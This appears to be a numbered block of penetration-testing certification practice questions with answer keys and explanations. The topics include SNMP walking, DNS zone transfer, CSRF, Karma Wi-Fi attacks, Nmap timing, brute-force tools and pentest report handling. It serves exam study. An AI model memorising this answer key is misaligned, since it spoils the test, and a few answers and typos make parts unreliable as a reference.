Alex is attempting to gather information from the management information database (MIB) of the SNMP services running on a network. Which tool in Kali Linux would serve this purpose?
A.snmpscan
B.snmpwalk
C.scanSNMP
D.snmpenum
B.snmpwalk
Explanation:
Snmpwalk, snmpget, and snmpset are useful when requesting specific OIDs related to an MIB or “walking” the MIB files to extract content from each variable. The data is not well formatted and it might be a bit hard to beautify the results.
411
Similar to Telnet, which Linux services are considered insecure, do not encrypt the traffic, and are often suppressed by new services?
A.VNC
B.rsh and rlogin
C.SSH
D.FTP
B.rsh and rlogin
Explanation:
RSH, rlogin, and rexec (513/tcp or 514/tcp) are otherwise known as “R-services” (each service has been superseded by features provided by SSH). These services do not encrypt remote connections and will expose login credentials and potentially sensitive data while in use.
412
George is gathering information about a specific person from the targeted company. He is collecting all kinds of data, such as shopping habits and delivery companies often used. In what type of attack would such information be useful?
A.Spear Phishing
B.Password cracking
C.Password Guessing
D.Privilege escalation
A.Spear Phishing
Explanation:
By collecting details about the person's habits, George could craft a phishing email with a malicious payload, which is likely to be executed due to the level of accuracy in the email statements. For example, he could send an email from a shipping company about a lost package, with a tracking link.
413
What action is an attacker attempting with the following command?
dig axfr @ns1.nameserver.com companydomain.com
A.DNS Zone Transfer
B.Getting whois for domain companydomain.com
C.Lookup for domain companydomain.com
D.Lookup for domain ns1.nameserver.com
A.DNS Zone Transfer
Explanation:
A DNS zone transfer (AXFR) is a transaction that is intended to be used between DNS servers to replicate databases. It could also be used for information gathering by attackers.
414
You are being tasked to perform a penetration test which includes Android mobile devices. What tool could you use to test the security on those devices?
A.OpenVAS
B.Nexpose
C.Any of these would be appropriate tools
D.Drozer
D.Drozer
Explanation:
Drozer from MWR labs (formerly known as Mercury) is one of the most leveraged Android security frameworks for pentesting Android applications
Drozer enables scanning for security vulnerabilities in Android applications by taking the role of a native Android application and interacting with the Dalvik Virtual Machine, other applications IPC endpoints and the OS beneath
OpenVAS is a software framework of several services and tools offering vulnerability scanning and vulnerability management.
Rapid7 Nexpose is a vulnerability scanner which aims to support the entire vulnerability management lifecycle, including discovery, detection, verification, risk classification, impact analysis, reporting and mitigation. It integrates with Rapid7's Metasploit for vulnerability exploitation.
415
Which tool provides similar functionality and toolsets to Burp, but is open source and free?
A.Nmap
B.OpenVAS
C.OWASP ZAP
D.Nessus
C.OWASP ZAP
Explanation:
OWASP ZAP is an open-source web application security scanner. It is intended to be used by both those new to application security as well as professional penetration testers. The method of using OWASP ZAP is quite similar to Burp.
416
James would like to review the SOAP project file to help him with the penetration test he is conducting. What is the SOAP project file?
A.Part of the application documentation
B.A database file produces by the vulnerability scanner
C.A list of vulnerabilities for a specific application
D.A configuration file
A.Part of the application documentation
Explanation:
The SOAP project file describes the format for sending and receiving messages in a web application. This file could be used by an attacker to learn the recommended methods of sending messages and potentially suggest ways to force it into error condition.
417
Company A and Company B are merging. What might happen if you conducted a pre-merger pentest of company A?
A.Pentesters might have to request formal approval from company B for the pentest
B.Company B might ask for a similar pentest against their environment
C.The companies will merge only if the pentest does not find any critical vulnerabilities
D.Company B may have a vested interest in how the companys assets and best interests are being protected
D.Company B may have a vested interest in how the companys assets and best interests are being protected
Explanation:
There is high probability that company B would inherit the weaknesses of company A when both environments are merged. Any potential vulnerability in the environment of company A could impact the environment of company B, as they would eventually be interconnected.
418
Once your pentest report is completed and ready to be provided to the client, what method should you use to send it the interested parties?
A.An encrypted mail message
B.Any secure method preapproved by all parties involved
C.There is no special requirement for report handling
D.A secure FTP site
B.Any secure method preapproved by all parties involved
Explanation:
The report does contain sensitive client information and should be handled with extreme care. The transmission method is usually decided on during the RoE discussion.
419
What method could be used to mitigate a cross-site request forgery attack?
A.CSRF Token
B.WAF
C.Cokee
D.SSL
A.CSRF Token
Explanation:
A cross-site request forgery is a type of client-side injection attack that causes a user to perform an action against a trusted website where the user is already authenticated with a valid session. The CSRF token is a unique, secret, randomized value that is generated by the server-side application and transmitted to the client in such a way that it is included in a subsequent HTTP request made by the client.
420
Review the code excerpt below. What does the error message in Python mean?
>>> import sys
>>> import urllib
>>> from os import win32
Traceback (most recent call last):
File "", line 1, in
ImportError: cannot import name win32
>>>
```
A.Python cannot execute the win32 library
B.Python needs to run on a 32-bit machine to import win32
C.There is no win32 module in the stdin library
D.The os library does not have a win32 module
```
D.The os library does not have a win32 module
Explanation:
Python is arguably the most popular programming language used by developers today. Like Ruby, Python is a general-purpose programming language and is also an interpreted language.
421
George is looking through the trash can in the HR office of the organization. What exploitation technique is he using?
A.Tailgating
B.Phishing
C.Shoulder Surfing
D.Dumpster Diving
D.Dumpster Diving
Explanation:
Penetration testers do occasionally engage in dumpster diving, or retrieving information from the organization’s trash receptacles.
422
John is asked to perform an Nmap scan against a network subnet for a client. The client informs John that the network is extremely stable and fast, and therefore swift results would be appreciated. How can John speed up the Nmap scan, as it takes a very long time with the default configuration?
A.John could use "-Pn" to speed up the scan using ICMP requests
B.John could use the "-T" flag to speed up the test
C.Nmap does not have an option to modify the timing of scans
D.John could use the "-F" flag for fast scanning
B.John could use the "-T" flag to speed up the test
Explanation:
The -T option is used to specify timing, using the numbers 0 to 5 or their corresponding names:
The template names are paranoid (0), sneaky (1), polite (2), normal (3), aggressive (4) and insane (5). The first two are for IDS evasion. Polite mode slows down the scan to use less bandwidth and target machine resources. Normal mode is the default and so -T3 does nothing. Aggressive mode speeds up scans by making the assumption that you are on a reasonably fast and reliable network. Insane mode assumes that you are on an extraordinarily fast network or are willing to sacrifice some accuracy for speed.
423
James has created a URL which, when clicked on, would attempt to execute a bank transfer if the user clicking on it has recently been authenticated in the bank's online website. What type of attack is James attempting?
A.CSRF
B.XSS
C.Clickjacking
D.SQL injection
A.CSRF
Explanation:
CSRF (cross-site request forgery) attack vectors can include vulnerable web pages, blogs, email, etc. These attacks are typically targeted and, when successful, can result in the the purchase of an item, the transfer of money, or the changing of a password. If the victim is an admin or has elevated privileges, the attack can target the ability to create or modifying existing accounts in an application.
424
Which of the following tools could be used in a denial-of-service attack?
A.Nmap
B.Hping
C.nslookup
D.Netcat
B.Hping
Explanation:
Denial-of-service (DOS) attacks can be conducted using stress-testing tools (sometimes called stressers); however, a tool like hping, which allows for packet modification, is also cable of producing denial-of-service conditions. Another tool that can be used for many attacks, including DOS, is Metasploit.
425
James is in the client's cafeteria running a Karma attack. How is Karma exploiting potential victims?
A.Karma listens for NTLM hashes and captures them.
B.Karma listens to network probe requests and presents itself as the network
C.Karma pushes false updates to the WiFi clients in the vicinity
D.Karma targets a specific access point and mirrors it
B.Karma listens to network probe requests and presents itself as the network
Explanation:
The Karma attack is an AP method used to listen for any network probe requests from a client to join a given network (not just one specifically targeted network, as in the Evil Twin attack). In turn, it will rebroadcast the ESSID from the victim in order to entice the victim to connect to the evil network.
426
What needs to be considered when performing a vulnerability scan if SCADA systems are involved?
A.SCADA systems are a very secure and need additional testing
B.SCADA systems need to be handled carefully, as they could be easily knocked out
C.There is no difference between SCADA and other systems
D.An NDA needs to be signed
B.SCADA systems need to be handled carefully, as they could be easily knocked out
Explanation:
SCADA systems are delicate, fragile environments that were never really developed with security in mind. A single TCP or UDP port scan against a SCADA component can cause catastrophic damage.
427
Which of the following tools could not be used in a server brute-force attack?
A.Patator
B.Nikto
C.Medusa
D.Hydra
B.Nikto
Explanation:
Nikto is a vulnerability scanner
Hydra and Medusa are brute-force tools.
Patator is also a brute forcing tool that was written as a result of frustration with using Hydra and Medusa
428
As a penetration tester, you are hired by a company to perform a penetration test at their location, which is in a country that is on the US government's list of places where export of encryption technology is restricted. In your bag of tools and software, you have encryption tools that fall under this US export restriction of encryption technology. What should you do?
A.Perform the tests remotely to avoid breaching the restrictions
B.Leave behind all restricted tools/software and travel without them
C.Transfer the tools to Canada over the Internet
D.You have legally bought the tools/software; this restriction does not concern you
B.Leave behind all restricted tools/software and travel without them
Explanation:
Penetration testers need to be aware of the export restrictions of their country and abide by them.
429
George has found an exploit on exploitdb that is matching his target specifications, and it appears that it might successfully be exploited. However, the exploit he has found is searching for the targeted service on a different port. What could George do to overcome this issue?
A.Modify the exploit by editing its code
B.Contact the exploit developer
C.Ask the owner of the targeted machine to change the port just for testing purposes
D.Nothing; if the port is different, then the target is not exploitable
A.Modify the exploit by editing its code
Explanation:
Exploit modification is common practice in penetration tests, when an exploit or POC for a specific target is available online, but it requires some minor changes. Usually such changes are rather simple to make and thus are done on the fly.
430
Alex would like to include her notes in the pentest report. The notes are long text files that would unnecessarily increase the size of the report. What would be the best way to include them?
A.The notes are not necessary; do not add them
B.Regardless of length, add them at the end of the report
C.Share the notes separately
D.Add them as an object in a Word version of the report
D.Add them as an object in a Word version of the report
Explanation:
The conclusion of a pentest report may include an appendix, which references artifacts that are associated with the pentest activities, including scan data, notes, etc. These artifacts can be inserted as objects in a pentest report formatted in Microsoft Word.
431
During reconnaissance, Ryan identified a service running on the remote host with an older version. Where would Ryan look for an exploit for this version?
A.Kali Linux website
B.Exploit-DB Website
C.SANS website
D.OWASP Website
B.Exploit-DB Website
Explanation:
Exploit-DB is a huge database with extensive lists of exploits for many different kinds of software. They maintain up-to-date lists of exploits and POCs for older and newer versions of software.
